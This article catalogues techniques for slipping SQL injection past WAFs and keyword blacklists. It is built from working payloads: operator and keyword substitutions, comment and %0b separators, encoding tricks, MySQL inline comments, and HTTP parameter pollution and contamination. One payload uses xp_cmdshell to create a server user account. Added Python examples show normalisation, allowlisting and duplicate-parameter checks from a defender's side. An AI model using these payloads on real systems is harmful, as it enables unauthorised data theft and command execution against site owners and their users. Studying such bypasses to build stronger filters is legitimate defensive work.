This article covers the main techniques for bypassing SQL injection filters. It goes into considerable detail and is worth reading to the end.

I. Approach to bypassing a WAF

Start from the first step, analyse the filter piece by piece, and then bypass it.

1. Filtering and, or

```
preg_match('/(and|or)/i', $id)

Filtered injection: 1 or 1 = 1
Filtered injection: 1 and 1 = 1
Bypassed injection: 1 || 1 = 1
Bypassed injection: 1 && 1 = 1
```

2. Filtering and, or, union

```
preg_match('/(and|or|union)/i', $id)

Filtered injection: union select user, password from users
Bypassed injection: 1 || (select user from users where user_id = 1) = 'admin'
```

3. Filtering and, or, union, where

```
preg_match('/(and|or|union|where)/i', $id)

Filtered injection: 1 || (select user from users where user_id = 1) = 'admin'
Bypassed injection: 1 || (select user from users limit 1) = 'admin'
```

4. Filtering and, or, union, where, limit

```
preg_match('/(and|or|union|where|limit)/i', $id)

Filtered injection: 1 || (select user from users limit 1) = 'admin'
Bypassed injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
```

5. Filtering and, or, union, where, limit, group by

```
preg_match('/(and|or|union|where|limit|group by)/i', $id)

Filtered injection: 1 || (select user from users group by user_id having user_id = 1) = 'admin'
Bypassed injection: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1
```

6. Filtering and, or, union, where, limit, group by, select

```
preg_match('/(and|or|union|where|limit|group by|select)/i', $id)

Filtered injection: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1
Bypassed injection: 1 || 1 = 1 into outfile 'result.txt'
Bypassed injection: 1 || substr(user,1,1) = 'a'
```

7. Filtering and, or, union, where, limit, group by, select, '

```
preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id)

Filtered injection: 1 || (select substr(group_concat(user_id),1,1) user from users) = 1
Bypassed injection: 1 || user_id is not null
Bypassed injection: 1 || substr(user,1,1) = 0x61
Bypassed injection: 1 || substr(user,1,1) = unhex(61)
```

8. Filtering and, or, union, where, limit, group by, select, ', hex

```
preg_match('/(and|or|union|where|limit|group by|select|\'|hex)/i', $id)

Filtered injection: 1 || substr(user,1,1) = unhex(61)
Bypassed injection: 1 || substr(user,1,1) = lower(conv(11,10,36))
```

9. Filtering and, or, union, where, limit, group by, select, ', hex, substr

```
preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr)/i', $id)

Filtered injection: 1 || substr(user,1,1) = lower(conv(11,10,36))
Bypassed injection: 1 || lpad(user,7,1)
```

10. Filtering and, or, union, where, limit, group by, select, ', hex, substr, whitespace

```
preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $id)

Filtered injection: 1 || lpad(user,7,1)
Bypassed injection: 1%0b||%0blpad(user,7,1)
```

II. Regex bypass

Bypass by exploiting the fuzzy-matching behaviour of the regex; for example, when '=' is filtered:

```
Filtered injection: 1 or 1 = 1
Bypassed injection: 1 or 1
Bypassed injection: 1 or '1'
Bypassed injection: 1 or char(97)
```

e.g.:

```
Filtered injection: 1 union select 1,table_name from information_schema.tables where table_name = 'users'
Bypassed injection: 1 union select 1,table_name from information_schema.tables where table_name between 'a' and 'z'
Bypassed injection: 1 union select 1,table_name from information_schema.tables where table_name between char(97) and char(122)
Bypassed injection: 1 union select 1,table_name from information_schema.tables where table_name between 0x61 and 0x7a
Bypassed injection: 1 union select 1,table_name from information_schema.tables where table_name like 0x7573657273
```

III. Generic bypasses

1. Comment sequences

```
?id=1+un/**/ion+se/**/lect+1,2,3--
```

2. Case variation

```
?id=1+UnIoN/**/SeLecT/**/1,2,3--
```

3. Keyword replacement

Some WAFs and similar filters use preg_replace to replace (strip) SQL keywords from the input:

```
?id=1+UNunionION+SEselectLECT+1,2,3--
?id=1+uni%0bon+se%0blect+1,2,3--
```

Sometimes the comment sequence '/**/' is also filtered; %0b can be used in its place:

```
Forbidden: http://localhost/id/1/**/||/**/lpad(first_name,7,1).html
Bypassed:  http://localhost/id/1%0b||%0blpad(first_name,7,1).html
```

4. Encoding

A classic example of this kind of check is the script Nukesentinel.php:

```php
// Check for UNION attack
// Copyright 2004 (c) Raven PHP Scripts
$blocker_row = $blocker_array[1];
if ($blocker_row['activate'] > 0) {
    // Case-insensitive substring tests on the raw query string and its base64 form
    if (stristr($nsnst_const['query_string'], '+union+') OR
        stristr($nsnst_const['query_string'], '%20union%20') OR
        stristr($nsnst_const['query_string'], '*/union/*') OR
        stristr($nsnst_const['query_string'], 'union') OR
        stristr($nsnst_const['query_string_base64'], '+union+') OR
        stristr($nsnst_const['query_string_base64'], '%20union%20') OR
        stristr($nsnst_const['query_string_base64'], '*/union/*') OR
        stristr($nsnst_const['query_string_base64'], 'union')) {
        //block_ip($blocker_row);
        die("BLOCK IP 1");
    }
}
```

```
Forbidden: http://localhost/php/?/**/union/**/select
Bypassed:  http://localhost/php/?/%2A%2A/union/%2A%2A/select
Bypassed:  http://localhost/php/?%2f**%2funion%2f**%2fselect
```

5. Buffer overflow

```
http://localhost/news.php?id=1+and+(select 1)=(select 0xA*1000)+union+select+1,2,version(),database(),user(),6,7,8,9,10--
```

6. Inline comments (MySQL)

```
http://localhost/news.php?id=1/*!UnIoN*/SeLecT+1,2,3--
http://localhost/news.php?id=/*!UnIoN*/+/*!SeLecT*/+1,2,concat(/*!table_name*/)+FrOm/*!information_schema*/.tables/*!WhErE*/+/*!TaBlE_sChEMa*/+like+database()--
```
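Every filter in sections I to III tests the request exactly as it arrived, which is why a different spelling of the same keyword slips past it. The following Python is an added example, not code from this page or from Nukesentinel: it canonicalises a parameter value into roughly what the database parser will read (repeated percent-decoding, comment markers and odd whitespace) before matching, and contrasts both blacklist styles with a positive digits-only allowlist for a numeric id. The sample values are constructed from the bypass strings quoted above; the keyword lists and the allowlist rule are assumptions for illustration.

```python
import re
from urllib.parse import unquote

# Constructed request values, taken from the bypass strings quoted in sections I-III.
SAMPLES = [
    "1%0b||%0blpad(user,7,1)",          # %0b in place of a space (section I, step 10)
    "1+UnIoN/**/SeLecT/**/1,2,3--",     # mixed case and /**/ as separators (III.1, III.2)
    "/%2A%2A/union/%2A%2A/select",      # percent-encoded comment markers (III.4)
    "%2f**%2funion%2f**%2fselect",      # percent-encoded slashes (III.4)
    "1/*!UnIoN*/SeLecT+1,2,3--",        # MySQL inline comment (III.6)
]

# Substring rule in the style of Nukesentinel.php: the keyword bound to the delimiters
# it expects, tested case-insensitively on the raw, still-encoded value (assumed list).
RAW_PATTERNS = ("+union+", "%20union%20", "*/union/*")

def raw_rule_blocks(value: str) -> bool:
    lowered = value.lower()
    return any(p in lowered for p in RAW_PATTERNS)

def normalize(value: str) -> str:
    """Canonicalise the value into roughly what the SQL parser will see."""
    for _ in range(3):                              # undo repeated percent-encoding
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    value = value.replace("+", " ")                 # form-encoded space
    value = re.sub(r"/\*!?|\*/", " ", value)        # /* */ and /*! */ act as whitespace
    value = re.sub(r"[\x00-\x20]+", " ", value)     # %0b, %00, tabs -> one ASCII space
    return value.strip().lower()

# Assumed keyword rule for illustration, applied only after normalisation.
NORMALIZED_RULE = re.compile(r"\b(union|select|lpad)\b|\|\||&&")

def normalized_rule_blocks(value: str) -> bool:
    return NORMALIZED_RULE.search(normalize(value)) is not None

def allowlist_blocks(value: str) -> bool:
    """Positive validation for a numeric id: anything but 1-10 digits is rejected."""
    return re.fullmatch(r"[0-9]{1,10}", value) is None

def evaluate(samples=SAMPLES) -> dict:
    """Number of samples each strategy rejects; the allowlist needs no keyword list."""
    return {
        "raw_substring_rule": sum(raw_rule_blocks(s) for s in samples),
        "normalized_rule": sum(normalized_rule_blocks(s) for s in samples),
        "allowlist": sum(allowlist_blocks(s) for s in samples),
    }
```

Calling `evaluate()` rejects none of the five samples with the raw substring rule and all five with either the normalised rule or the allowlist; `normalize()` is also the form worth logging, since it is what the database would have parsed.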

IV. Advanced bypasses

1. HPP (HTTP parameter pollution)

An example:

```
index.php?par1=val1&par1=val2
```

| web server  | par1      |
|:---|:---|
| ASP.NET/IIS | val1,val2 |
| ASP/IIS     | val1,val2 |
| PHP/Apache  | val2      |
| JSP/Tomcat  | val1      |

e.g.:

In an ASP/ASP.NET environment:

```
Forbidden: http://localhost/search.aspx?q=select name,password from users
Bypassed:  http://localhost/search.aspx?q=select name&q=password from users
Bypassed:  http://localhost/search.aspx?q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/users
Bypassed:  http://localhost/news.aspx?id=1';/*&id=1*/EXEC/*&id=1*/master..xp_cmdshell/*&id=1*/net user test test/*&id=1*/--
```
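The table above is the whole problem for a filter: each platform assembles a repeated parameter differently, so a check that inspects every occurrence on its own never sees the string the backend runs. This Python is an added example, not from the page: it reproduces the three resolution rules from the table, shows that a per-occurrence check misses the split query while the same rule applied to the backend's assembled value catches it, and adds the cheap mitigation of rejecting repeated parameter names. The keyword rule and its two-keyword threshold are assumptions for illustration; the query strings are constructed from the examples above.

```python
import re
from urllib.parse import parse_qsl

# Constructed query strings, using the HPP examples from this section.
PLAIN = "q=select name,password from users"
SPLIT = "q=select name&q=password from users"
SPLICED = "q=select/*&q=*/name&q=password/*&q=*/from/*&q=*/users"

def pairs(qs):
    return parse_qsl(qs, keep_blank_values=True)

def occurrences(qs, name):
    return [v for k, v in pairs(qs) if k == name]

# How each platform in the table above resolves a repeated parameter.
def aspnet_value(qs, name):   # ASP.NET/IIS and ASP/IIS: all occurrences, comma-joined
    return ",".join(occurrences(qs, name))

def php_value(qs, name):      # PHP/Apache: the last occurrence wins
    vals = occurrences(qs, name)
    return vals[-1] if vals else ""

def jsp_value(qs, name):      # JSP/Tomcat: the first occurrence wins
    vals = occurrences(qs, name)
    return vals[0] if vals else ""

# Assumed keyword rule for illustration: a value is suspicious with two or more keywords.
def sql_keywords(value):
    v = re.sub(r"/\*.*?\*/", " ", value.lower())   # a closed comment is whitespace to the parser
    return [k for k in ("select", "from", "union", "where") if re.search(rf"\b{k}\b", v)]

def per_occurrence_flags(qs, name):
    """Filter that tests each occurrence of the parameter by itself."""
    return any(len(sql_keywords(v)) >= 2 for v in occurrences(qs, name))

def backend_view_flags(qs, name, resolve=aspnet_value):
    """The same rule applied to the value the backend will actually assemble."""
    return len(sql_keywords(resolve(qs, name))) >= 2

def duplicate_names(qs):
    """Cheapest mitigation: a request that repeats a parameter name is itself anomalous."""
    seen, dups = set(), set()
    for k, _ in pairs(qs):
        (dups if k in seen else seen).add(k)
    return sorted(dups)
```

For SPLIT the per-occurrence check stays quiet, the ASP.NET view fires, and the PHP and JSP views do not, which is exactly the column difference in the table; SPLICED shows why the backend view must also treat comments as whitespace.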

2. HPC (HTTP parameter contamination)

RFC 2396 defines the following character classes:

```
Unreserved: a-z, A-Z, 0-9 and _ . ! ~ * ' ( )
Reserved:   ; / ? : @ & = + $ ,
Unwise:     { } | \ ^ [ ] `
```

Different web servers apply different logic when parsing such specially constructed requests:

| Query string | Apache/2.2.16, PHP/5.3.3 | IIS6/ASP |
|:---|:---|:---|
| ?test[1=2   | test_1=2  | test[1=2 |
| ?test=%     | test=%    | test=    |
| ?test%00=1  | test=     | test=1   |
| ?test=1%001 | NULL      | test=1   |
| ?test+d=1+2 | test_d=12 | testd=12 |

e.g.:

```
Forbidden: http://localhost/?xp_cmdshell
Bypassed:  http://localhost/?xp[cmdshell
Forbidden: http://localhost/test.asp?file=../flag.txt
Bypassed:  http://localhost/test.asp?file=.%./flag.txt
Forbidden: http://localhost/news.asp?id=10 and 1=0/(select top 1 table_name from information_schema.tables)
Bypassed:  http://localhost/news.asp?id=10 a%nd 1=0/(se%lect top 1 ta%ble_name fr%om info%rmation_schema.tables)
```
